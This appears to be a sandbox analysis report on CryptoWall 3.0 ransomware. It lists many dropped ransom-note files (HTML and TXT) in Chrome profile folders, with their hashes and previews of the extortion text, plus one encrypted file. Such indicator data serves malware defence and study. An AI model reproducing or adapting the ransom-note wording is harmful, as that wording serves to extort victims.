                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips\2986\_metadata\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips\2986\_metadata\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips\2986\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips\2986\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\35\9.47.0\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\35\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\35\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.47.0\LICENSE.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):25454
                                                                                                                          Entropy (8bit):7.99227459143512
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GFrzczxXSCB4SdMQyhIn6gYRWCxo46KwqPz:areSpSdWhWwPxoVKL
                                                                                                                          MD5:E6ABD7C9E18AFE67432BB48B310EBD63
                                                                                                                          SHA1:EA9B4C3C30FF4E3A65999926B66B522411F9E12A
                                                                                                                          SHA-256:714A564B35C4153EC563919FAF68C3109F6D5E3B256C48E85E780A425B7B10E2
                                                                                                                          SHA-512:F82F71BBCECCECCBCF58593D8233DB95D5CF044CADDB120E94408778BF059F9DA3B366B85D84D18ED6A40F56FEFBEE79E218121F564FC2E8CD52C5F1551C0F79
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......D.i=....6#..a...5sQ.a..j,k@....X...n.....[.>S...+m..5t....i...|....~.y.....6...&...........B.;./........%.97.|O.k.(... yw...I...4Rm..U.^.w.1...u....3B..U+..<..Uy?..'3.{1....Qo@.C.....k.!Ml).M......|:....~<9.........I..r.c...s5.....Do....t.b.;...F..,L..gn........U#".....q..b$....5...J..c.d.A..<WU.oH.&..p....Z2..s.,J..E..zO..K8..<...<...M.1.4..7.AV.7y..(8.{..e...)....z.%..0.8.6.... ..Z....LJ9..9.v[.>C..][....!L..N.r..z....L`..lh..FP...X_......K...-..3+.....A..9.t.N>..Gt.q...g.y.Eo...$...7.5.......h.[.#..,W...{v).V.....I.aXG.r...\.F{.y....w.x7]t%[..D./@1....V..n.a.Q..[.....

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\4\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\4\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
